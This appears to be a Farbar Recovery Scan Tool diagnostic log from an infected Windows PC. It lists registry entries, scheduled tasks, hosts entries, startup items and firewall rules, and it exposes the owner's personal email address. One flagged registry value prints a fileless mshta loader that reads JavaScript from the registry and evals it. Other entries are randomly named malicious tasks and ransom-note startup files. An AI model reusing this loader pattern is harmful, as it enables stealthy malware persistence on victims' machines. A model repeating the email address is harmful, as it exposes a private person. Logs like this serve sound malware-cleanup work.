CustomCLSID: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001_Classes\CLSID\{162C6FB5-44D3-435B-903D-E613FA093FB5}\InprocServer32 -> C:\Users\Dan\AppData\Local\Microsoft\OneDrive\17.3.6998.0830\amd64\FileCoAuthLib64.dll => No File
CustomCLSID: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001_Classes\CLSID\{e8c77137-e224-5791-b6e9-ff0305797a13}\InprocServer32 -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll (Adobe Systems)
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\Software\Classes\f2e8449: "C:\Windows\system32\mshta.exe" "javascript:TOWG9H8n="9fTue2";F6q=new ActiveXObject("WScript.Shell");yYl78Ye="OOPGIb";j0tdG8=F6q.RegRead("HKCU\\software\\wsfl\\nfhvb");CnQ2SRmC="VxncXy";eval(j0tdG8);Cw1zFO6q="2Od3ft0";" <==== ATTENTION
ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-05-22] ()
ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-05-22] ()
ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-05-22] ()
ShellIconOverlayIdentifiers: [!AsusWSShellExt_B] -> {6D4133E5-0742-4ADC-8A8C-9303440F7191} => C:\Program Files (x86)\Common Files\AWS\2.1.2.301\ASUSWSShellExt64.dll [2013-06-25] (ASUS Cloud Corporation.)
ShellIconOverlayIdentifiers: [!AsusWSShellExt_O] -> {64174815-8D98-4CE6-8646-4C039977D809} => C:\Program Files (x86)\Common Files\AWS\2.1.2.301\ASUSWSShellExt64.dll [2013-06-25] (ASUS Cloud Corporation.)
ShellIconOverlayIdentifiers: [!AsusWSShellExt_U] -> {1C5AB7B1-0B38-4EC4-9093-7FD277E2AF4E} => C:\Program Files (x86)\Common Files\AWS\2.1.2.301\ASUSWSShellExt64.dll [2013-06-25] (ASUS Cloud Corporation.)
ContextMenuHandlers1-x32: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files (x86)\7-Zip\7-zip.dll [2010-11-18] (Igor Pavlov)
ContextMenuHandlers1-x32: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-05-22] ()
ContextMenuHandlers1-x32: [Comodo Antivirus] -> {4255A182-CAD9-4214-A19B-7BA7FB633BBD} => C:\Program Files\COMODO\COMODO Internet Security\cavshell.dll [2016-07-10] (COMODO)
ContextMenuHandlers1-x32: [Gonzales] -> {A50F8401-953F-4C11-8B77-1278C6C7C3F4} => C:\Program File (x86) BitDefender Antivirus\Bitdefender\Antivirus Free Edition\GzShellIntegration.dll [2018-03-08] (Bitdefender)
ContextMenuHandlers1-x32: [ShellConverter] -> {30A4E07E-068A-4d91-8F05-691283A1336B} => C:\Program Files (x86)\Common Files\AVSMedia\ActiveX\AVSShellConverter64.dll [2015-04-06] (Online Media Technologies Ltd.)
ContextMenuHandlers1-x32: [SysMenuExt] -> {020B1D4B-5738-4C77-9E19-4F173DD9B486} => C:\Program Files\Common Files\System\SysMenu64.dll -> No File
ContextMenuHandlers1-x32: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program File (x86) WinRar - Extract ISO & Rar Files\rarext64.dll [2016-02-04] (Alexander Roshal)
ContextMenuHandlers1-x32-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program File (x86) WinRar - Extract ISO & Rar Files\rarext.dll [2016-02-04] (Alexander Roshal)
ContextMenuHandlers1-x32-x32: [_MovaviSuite10] -> {9D700AB0-33CE-4ab3-BD66-3A73CC2CEDE3} => C:\Program File (x86) Movavi Video Editor Suite 12 - (Free Cracked Version)\Movavi Video Suite 12\vcContext\vcContext.dll [2013-12-11] (Movavi)
ContextMenuHandlers2: [Comodo Antivirus] -> {4255A182-CAD9-4214-A19B-7BA7FB633BBD} => C:\Program Files\COMODO\COMODO Internet Security\cavshell.dll [2016-07-10] (COMODO)
ContextMenuHandlers2-x32: [VMDiskMenuHandler] -> {271DC252-6FE1-4D59-9053-E4CF50AB99DE} => C:\Program Files (x86)\VMware\VMware Player\vmdkShellExt.dll [2015-06-24] (VMware, Inc.)
ContextMenuHandlers2-x32: [VMDiskMenuHandler64] -> {E4D28EDC-8C0B-43EE-9E7D-C8A8682334DC} => C:\Program Files (x86)\VMware\VMware Player\x64\vmdkShellExt64.dll [2015-06-24] (VMware, Inc.)
ContextMenuHandlers3: [BackupContextMenuExtension] -> {b1b96b20-da1d-4a3c-92c1-7229b32f2326} => C:\Windows\system32\mscoree.dll [2013-08-22] (Microsoft Corporation)
ContextMenuHandlers4-x32: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files (x86)\7-Zip\7-zip.dll [2010-11-18] (Igor Pavlov)
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\Windows\system32\igfxpph.dll [2013-11-13] (Intel Corporation)
ContextMenuHandlers6: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-05-22] ()
ContextMenuHandlers6: [Comodo Antivirus] -> {4255A182-CAD9-4214-A19B-7BA7FB633BBD} => C:\Program Files\COMODO\COMODO Internet Security\cavshell.dll [2016-07-10] (COMODO)
ContextMenuHandlers6: [Gonzales] -> {A50F8401-953F-4C11-8B77-1278C6C7C3F4} => C:\Program File (x86) BitDefender Antivirus\Bitdefender\Antivirus Free Edition\GzShellIntegration.dll [2018-03-08] (Bitdefender)
ContextMenuHandlers6: [RUShellExt] -> {2C5515DC-2A7E-4BFD-B813-CACC2B685EB7} => C:\Program File (x86) - RevoUninPro - Uninstaller program - 30 Day Free Trial - 5-15-2016\Revo Uninstaller Pro\RUExt.dll [2012-12-29] (VS Revo Group)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program File (x86) WinRar - Extract ISO & Rar Files\rarext64.dll [2016-02-04] (Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program File (x86) WinRar - Extract ISO & Rar Files\rarext.dll [2016-02-04] (Alexander Roshal)
ContextMenuHandlers6-x32: [_MovaviSuite10] -> {9D700AB0-33CE-4ab3-BD66-3A73CC2CEDE3} => C:\Program File (x86) Movavi Video Editor Suite 12 - (Free Cracked Version)\Movavi Video Suite 12\vcContext\vcContext.dll [2013-12-11] (Movavi)
ContextMenuHandlers1_S-1-5-21-1066246007-1091995785-1061003623-1001: [SysMenuExt] -> {020B1D4B-5738-4C77-9E19-4F173DD9B486} => C:\Program Files\Common Files\System\SysMenu64.dll -> No File
 
==================== Scheduled Tasks (Whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {0871BC7F-DE9B-4C30-A460-54D7FCC6F3C7} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-11-12] (Google Inc.)
Task: {0B68F930-F054-44FD-8480-C9B2E8CE6446} - System32\Tasks\AsusVibeSchedule => C:\Program Files (x86)\Asus\AsusVibe\AsusVibeLauncher.exe [2013-11-04] ()
Task: {13F4F7F9-754A-479C-95B7-2668E5195C53} - System32\Tasks\ASUS Live Update2 => C:\Program Files (x86) [Argument = -check]
Task: {2283DE1E-0461-4B5C-93B8-792D6C6384D6} - System32\Tasks\{31DDBD37-5DB7-4030-8064-10B0CAA806C3} => C:\Program Files\COMODO\COMODO Internet Security\cistray.exe [2016-07-10] (COMODO)
Task: {2BD7BF5D-C4CF-4669-A2BC-FD410979401B} - System32\Tasks\ASUS Live Update1 => C:\Program Files (x86) [Argument = -critical]
Task: {39FEF968-A8FF-4F5C-9196-0E7AA2353384} - System32\Tasks\ASUS Smart Gesture Launcher => C:\Program Files (x86)\ASUS\ASUS Smart Gesture\AsTPCenter\x64\AsusTPLauncher.exe [2014-03-31] (AsusTek)
Task: {4C290D38-8E4F-4E0C-8A57-748C6445EFF3} - System32\Tasks\ASUS Splendid ColorU => C:\Program Files (x86)\ASUS\Splendid\ColorUService.exe [2013-10-07] (ASUSTeK Computer Inc.)
Task: {4D574819-623E-459C-ADAA-ABE4DA8328F0} - System32\Tasks\RTKCPL => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [2014-03-20] (Realtek Semiconductor)
Task: {547698E5-4F4A-441A-BB7D-0BCEAA6F0593} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-11-12] (Google Inc.)
Task: {59E33C91-940C-4B1B-8875-D56CF8C1F9EA} - System32\Tasks\PinItAutoUpdate => C:\Program Files (x86)\Pinterest\Pin It\AutoUpdater.exe [2013-10-17] ()
Task: {5AA3BDDC-F135-471F-BAFD-C4667F07FEC5} - System32\Tasks\{D3CF4331-7A31-4F84-BB21-69FA5F743E7A} => C:\Windows\system32\pcalua.exe -a C:\Windows\986246e4d4365334c49f584d3435ca41.exe
Task: {73A5F5CB-0B75-4158-B3D5-60B79A55381B} - System32\Tasks\COMODO\COMODO Signature Update {B9D5C6F9-17D2-4917-8BD0-614BAA1C6A59} => C:\Program Files\COMODO\COMODO Internet Security\cfpconfg.exe [2016-07-10] (COMODO)
Task: {7A810030-3719-44B1-86D4-C623F0136B7E} - System32\Tasks\COMODO\COMODO Autostart {D5EFF3B3-E126-4AF6-BCE9-852A72129E10} => C:\Program Files\COMODO\COMODO Internet Security\cistray.exe [2016-07-10] (COMODO)
Task: {885E1D98-007F-4A6C-9B21-CB66F24620E1} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2016-02-12] (Piriform Ltd)
Task: {933A0EAA-67D1-40AD-8272-FE777ED5D1C2} - System32\Tasks\{C26243DB-2C37-44EE-9F28-CE2E8B7FC0E3} => C:\Program Files (x86)\pAuZbg.exe [1623-04-04] (Microsoft Corporation) <==== ATTENTION
Task: {97F7FC31-B27F-47F6-A95A-B187E18672B2} - System32\Tasks\{81D52804-7B29-49D2-80AA-07954E82952B} => C:\Program Files (x86)\YuIeaAuVrYQ.exe [1623-04-04] (Microsoft Corporation) <==== ATTENTION
Task: {985790D0-EF1D-4BF1-96BA-E15830E37E2E} - System32\Tasks\COMODO\COMODO Update {A6D52E4F-569B-4756-B3D8-DF217313DA85} => C:\Program Files\COMODO\COMODO Internet Security\cfpconfg.exe [2016-07-10] (COMODO)
Task: {9C0EB61C-E232-4548-847B-0FBE48C483F2} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {9E90D4EA-24E8-466B-AEE7-2D93FD4EFF51} - System32\Tasks\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser => Command(1): %windir%\system32\rundll32.exe -> aepdu.dll,AePduRunUpdate -nolegacy
Task: {9E90D4EA-24E8-466B-AEE7-2D93FD4EFF51} - System32\Tasks\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser => Command(2): %windir%\system32\rundll32.exe -> appraiser.dll,DoScheduledTelemetryRun
Task: {B489F90E-C13F-4994-9853-8778C8E31344} - System32\Tasks\Microsoft\Windows\Application Experience\ProgramDataUpdater => Command(1): %windir%\system32\rundll32.exe -> aepdu.dll,AePduRunUpdate
Task: {B489F90E-C13F-4994-9853-8778C8E31344} - System32\Tasks\Microsoft\Windows\Application Experience\ProgramDataUpdater => Command(2): %windir%\system32\rundll32.exe -> invagent.dll,RunUpdate
Task: {B555837A-F36E-4453-A0C0-E1982D23AE8A} - System32\Tasks\ASUS Splendid ACMON => C:\Program Files (x86)\ASUS\Splendid\ACMON.exe [2013-10-07] (ASUS)
Task: {B68434B3-38F7-4E31-9788-A98D73098673} - System32\Tasks\{CF06CADB-185A-4E37-941E-EF8A74A640B8} => C:\Windows\system32\pcalua.exe -a "E:\Free Software Programs\Program File (x86) Chopper XP DVD VOP Video Cutter\Chopper XP\Chopper.exe" -d "E:\Free Software Programs\Program File (x86) Chopper XP DVD VOP Video Cutter\Chopper XP"
Task: {BCE45004-B0FC-4F7C-9E96-2E7DBD2AE33E} - System32\Tasks\AdobeAAMUpdater-1.0-MicrosoftAccount-danbanic1@hotmail.com => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2016-07-01] (Adobe Systems Incorporated)
Task: {C0EA6C51-0D21-4C1C-9AD2-4B14A9002B63} - System32\Tasks\{7AABF775-AB66-4734-B6C6-CD26D49E39AF} => C:\Windows\system32\pcalua.exe -a "C:\Program File (x86) Chopper XP DVD VOP Video Cutter\Chopper XP\Chopper.exe" -d "C:\Program File (x86) Chopper XP DVD VOP Video Cutter\Chopper XP"
Task: {C2E59037-9F26-40BC-B416-8F2A7E22E244} - System32\Tasks\Update Checker => C:\Program Files (x86)\ASUS\ASUS Live Update\UpdateChecker.exe [2014-03-11] ()
Task: {EB9B2DA6-E063-4F2A-A690-9A70E1E8FBE9} - System32\Tasks\RtHDVBg => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [2014-03-31] (Realtek Semiconductor)
Task: {F675F9DA-7832-44FC-B84F-99A0B7E15237} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2018-02-09] (Adobe Systems Incorporated)
Task: {FBF83420-4969-4297-B1AF-91B1C6329E4F} - System32\Tasks\6320c4d4d9492959f6f8b43b8fdbf2f5 => sc start 6320c4d4d9492959f6f8b43b8fdbf2f5 <==== ATTENTION
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
 
==================== Shortcuts & WMI ========================
 
(The entries could be listed to be restored or removed.)
 
 
Shortcut: C:\Users\Dan\Desktop\SoftTeddy 3D - run.bat - Shortcut.lnk -> C:\Program File (x86) SmoothTeddy 3D - Simple 3D Program\SmoothTeddy\run.bat ()
Shortcut: C:\Users\Dan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ShapeShop\ShapeShop3d.com.lnk -> hxxp://www.shapeshop3d.com
Shortcut: C:\Users\Dan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ShapeShop\Tutorial Videos At Vimeo.lnk -> hxxp://www.vimeo.com/shapesho
 
ShortcutWithArgument: C:\Users\Dan\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\a06339e9776d4569\Instagram for Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> "
 
==================== Loaded Modules (Whitelisted) ==============
 
2015-02-02 09:23 - 2011-02-28 18:37 - 000095008 _____ () C:\Windows\System32\Primomonnt.dll
2016-05-22 19:33 - 2016-05-22 19:33 - 000491184 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll
2018-03-22 21:50 - 2018-03-22 21:50 - 000369872 _____ () C:\ProgramData\dahhService\dahhService.exe
2017-08-11 19:17 - 2018-03-07 22:45 - 012021840 _____ () C:\Program Files\Gramblr\gramblr.exe
2018-03-22 19:26 - 2018-03-20 02:00 - 002683224 _____ () C:\Program Files (x86)\Google\Chrome\Application\65.0.3325.181\swiftshader\libglesv2.dll
2018-03-22 19:26 - 2018-03-20 02:00 - 000127832 _____ () C:\Program Files (x86)\Google\Chrome\Application\65.0.3325.181\swiftshader\libegl.dll
2016-05-22 19:32 - 2016-05-22 19:32 - 031680176 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync.exe
2014-02-24 06:59 - 2014-02-24 06:59 - 000109056 _____ () C:\Program Files (x86)\ASUS\WebStorage\2.1.2.301\ASUSWSHomeCloudAPI.dll
2018-03-22 21:52 - 2018-03-22 21:52 - 002150400 _____ () C:\Windows\9b2582d4a23748e2d93e755c9fbf7de5.dll
2013-10-08 23:41 - 2013-10-08 23:41 - 000037968 _____ () C:\Program Files (x86)\ASUS\Splendid\DetectDisplayDC.dll
2013-09-09 21:23 - 2013-09-09 21:23 - 000162816 _____ () C:\Program Files (x86)\ASUS\Splendid\CCTAdjust.dll
2015-06-24 15:28 - 2015-06-24 15:28 - 001301720 _____ () C:\Program Files (x86)\VMware\VMware Player\libxml2.dll
2016-08-24 08:45 - 2016-08-24 08:45 - 040523456 _____ () C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\CEF\libcef.dll
2016-06-08 00:10 - 2016-06-08 00:10 - 000118272 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\fs-ext\build\Release\fs-ext.node
2016-06-08 00:10 - 2016-06-08 00:10 - 000205824 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\node-vulcanjs\build\Release\VulcanJS.node
2016-06-08 00:10 - 2016-06-08 00:10 - 000117248 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\ref\build\Release\binding.node
2016-06-08 00:10 - 2016-06-08 00:10 - 000125440 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\ffi\build\Release\ffi_bindings.node
2016-08-24 08:24 - 2016-08-24 08:24 - 000098496 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\node-ProxyResolver\build\Release\ProxyResolverWin.dll
2016-06-08 00:10 - 2016-06-08 00:10 - 000166400 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\idle-gc\build\Release\idle-gc.node
 
==================== Alternate Data Streams (Whitelisted) =========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
AlternateDataStreams: C:\ProgramData\Temp:862BDB1A [139]
AlternateDataStreams: C:\Users\Dan\Downloads\Anti-CryptorBitV2.zip:BDU [1]
 
==================== Safe Mode (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\CatWSPrx => ""="service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\CatWSw8 => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ColorMedia => ""="service"
 
==================== Association (Whitelisted) ===============
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
 
 
==================== Internet Explorer trusted/restricted ===============
 
(If an entry is included in the fixlist, it will be removed from the registry.)
 
IE trusted site: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\groovesquid.com -> hxxps://groovesquid.com
IE trusted site: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\instagram.com -> hxxps://instagram.com
IE trusted site: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\mediashuttle.com -> hxxps://media-shuttle-free-trial-portal.mediashuttle.com
IE trusted site: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\mycloud.com -> hxxps://idp.mycloud.com
IE trusted site: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\spotify.com -> hxxps://www.spotify.com
IE trusted site: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\winamp.com -> hxxps://www.winamp.com
IE restricted site: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\doubleclick.net -> hxxps://doubleclick.net
 
==================== Hosts content: ==========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2013-08-22 09:25 - 2018-03-22 21:51 - 000001330 _____ C:\Windows\system32\Drivers\etc\hosts
 
127.0.0.1 cpm.paneladmin.pro
127.0.0.1 publisher.hmdiadmingate.xyz
127.0.0.1 hmdicrewtracksystem.xyz
127.0.0.1 mydownloaddomain.com
127.0.0.1 linkmate.space
127.0.0.1 space1.adminpressure.space
127.0.0.1 trackpressure.website
127.0.0.1 doctorlink.space
127.0.0.1 plugpackdownload.net
127.0.0.1 texttotalk.org
127.0.0.1 gambling577.xyz
127.0.0.1 htagdownload.space
127.0.0.1 mybcnmonetize.com
127.0.0.1 360devtraking.website
127.0.0.1 dscdn.pw
127.0.0.1 bcnmonetize.go2affise.com
127.0.0.1 beautifllink.xyz
 
==================== Other Areas ============================
 
(Currently there is no automatic fix for this section.)
 
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\Control Panel\Desktop\\Wallpaper -> C:\Windows\asus\wallpapers\asus.jpg
DNS Servers: Media is not connected to internet.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: RequireAdmin)
Windows Firewall is enabled.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
HKLM\...\StartupApproved\StartupFolder: => "_RECOVERY_+vplym.html"
HKLM\...\StartupApproved\StartupFolder: => "_RECOVERY_+vplym.png"
HKLM\...\StartupApproved\StartupFolder: => "_RECOVERY_+vplym.txt"
HKLM\...\StartupApproved\Run32: => "YTDownloader"
HKLM\...\StartupApproved\Run32: => "avgnt"
HKLM\...\StartupApproved\Run32: => "Wondershare Helper Compact.exe"
HKLM\...\StartupApproved\Run32: => "Dropbox"
HKLM\...\StartupApproved\Run32: => "APSDaemon"
HKLM\...\StartupApproved\Run32: => "QuickTime Task"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\StartupFolder: => "_RECOVERY_+pillt.html"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\StartupFolder: => "_RECOVERY_+pillt.png"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\StartupFolder: => "_RECOVERY_+pillt.txt"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\StartupFolder: => "_RECOVERY_+vplym.html"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\StartupFolder: => "_RECOVERY_+vplym.png"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\StartupFolder: => "_RECOVERY_+vplym.txt"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\Run: => "ChocolateBar Sidebar"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\Run: => "YTDownloader"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\Run: => "xdm"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\Run: => "CCleaner Monitoring"
 
==================== FirewallRules (Whitelisted) ===============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
FirewallRules: [{84E7D022-D859-4AAD-93A3-1E9E9F1C1E0D}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD10\PowerDVD10.EXE
FirewallRules: [{CEC34761-FBD2-4DD1-8310-5F8AAF53D82E}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nswB7A8.tmp\CnetInstaller-75409715.exe
FirewallRules: [{F5CAA7A9-D801-4982-AFF8-C7D20E365B8F}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nswB7A8.tmp\CnetInstaller-75409715.exe
FirewallRules: [{9AD6A247-DC93-49BD-8D91-890B72E639F4}] => (Allow) LPort=1886
FirewallRules: [{9EA4A53B-4ABC-431F-BAC0-C0EC0E42A3FE}] => (Allow) LPort=1886
FirewallRules: [{FEBB96C1-B31C-436C-A9CC-4ACDFDCEB1D1}] => (Allow) C:\ProgramData\makulitsidwe\1.1.0.29\cozaghost.exe
FirewallRules: [{3CE5225E-435B-4FE5-A84B-1C2A07EC44D6}] => (Allow) C:\ProgramData\makulitsidwe\1.1.0.29\cozaghost.exe
FirewallRules: [{7D2E9490-E89D-4031-927A-417C014ADFFC}] => (Allow) C:\ProgramData\makulitsidwe\1.1.0.29\cozaghost.exe
FirewallRules: [{55D48809-1F66-4497-9319-FE74A5051B36}] => (Allow) C:\ProgramData\makulitsidwe\1.1.0.29\cozaghost.exe
FirewallRules: [{E54BD4BD-3E8D-48F2-97B8-FFF46F726355}] => (Allow) C:\ProgramData\makulitsidwe\1.1.0.29\cozaghost.exe
FirewallRules: [{0FF7443B-3A64-41AE-B2A4-92DD6C564CDF}] => (Allow) C:\Users\Dan\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe
FirewallRules: [{5EF00627-14E5-43A4-B60F-A6A8995519C2}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{7A2FABE4-0106-4B09-A794-4F7019561123}] => (Allow) LPort=2869
FirewallRules: [{FC21E2C2-60FC-4224-9CD1-3C4CE101335A}] => (Allow) LPort=1900
FirewallRules: [{AB859042-2A95-4E72-A252-8A16F00E2698}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe
FirewallRules: [{07710B1F-203C-4B52-80E1-6E5A435B0B49}] => (Allow) C:\Program Files (x86)\Techgile\bin\Techgile.BRT.Helper.exe
FirewallRules: [{6E036BFF-833F-4CBD-99E0-702EBDE37553}] => (Allow) C:\Program Files (x86)\Techgile\bin\Techgile.BRT.Helper.exe
FirewallRules: [{CF59B7AE-9D77-40E1-B0FF-DD3E8617864B}] => (Allow) C:\Program File (x86) WINAMP Radio & Music Player Browser\Winamp\winamp.exe
FirewallRules: [{A2503CB4-8DD7-4CC1-A35F-44508F1217D5}] => (Allow) C:\Program File (x86) WINAMP Radio & Music Player Browser\Winamp\winamp.exe
FirewallRules: [{D6E98B02-4D68-4CC7-81C6-AF5504789A11}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\jrmcp.exe
FirewallRules: [{E0012F5B-40C2-4C24-9F76-8D65BAE96E8D}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\jrmcp.exe
FirewallRules: [{65BCBA58-B251-45D5-8F6F-4AFDD83D9EA3}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\jbp.exe
FirewallRules: [{8A98D66E-7964-43B4-828C-2636B3B9C376}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\jbp.exe
FirewallRules: [{C6709782-46D1-43D4-AA0D-221D650F01CE}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\jwmpp.exe
FirewallRules: [{41D0374F-2166-47ED-9C01-347C96AD8EEA}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\jwmpp.exe
FirewallRules: [{0D4021A7-68FA-4CAD-A92D-9B89BAB9D6D8}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\ffmpeg.exe
FirewallRules: [{61459AFB-F078-4819-83A0-32430B3DFE90}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\ffmpeg.exe
FirewallRules: [{FB331439-BAF3-421D-8363-0B7DBAF28328}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\aria2c.exe
FirewallRules: [{828F9004-D6AD-424B-B9AF-358E09E6D59D}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\aria2c.exe
FirewallRules: [{61951D9D-D9E8-4098-BBC4-DCE2C15E0A37}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\qtCopy.exe
FirewallRules: [{9D7ECD7E-4081-463D-A7A1-66901FB4631A}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\qtCopy.exe
FirewallRules: [TCP Query User{0D97D9AA-F1E5-482A-B3FF-B4CBC63122EE}C:\program file (x86) free torrent download dvdsoft\dvdvideosoft\free torrent download\freetorrentdownload.exe] => (Allow) C:\program file (x86) free torrent download dvdsoft\dvdvideosoft\free torrent download\freetorrentdownload.exe
FirewallRules: [UDP Query User{4D865EC7-719F-465D-8376-EDE19BB17CB9}C:\program file (x86) free torrent download dvdsoft\dvdvideosoft\free torrent download\freetorrentdownload.exe] => (Allow) C:\program file (x86) free torrent download dvdsoft\dvdvideosoft\free torrent download\freetorrentdownload.exe
FirewallRules: [TCP Query User{C62A3DCA-EF3A-4BFA-AD77-530BA8EB30A7}E:\free software programs\program file (x86) free torrent download dvdsoft\dvdvideosoft\free torrent download\freetorrentdownload.exe] => (Block) E:\free software programs\program file (x86) free torrent download dvdsoft\dvdvideosoft\free torrent download\freetorrentdownload.exe
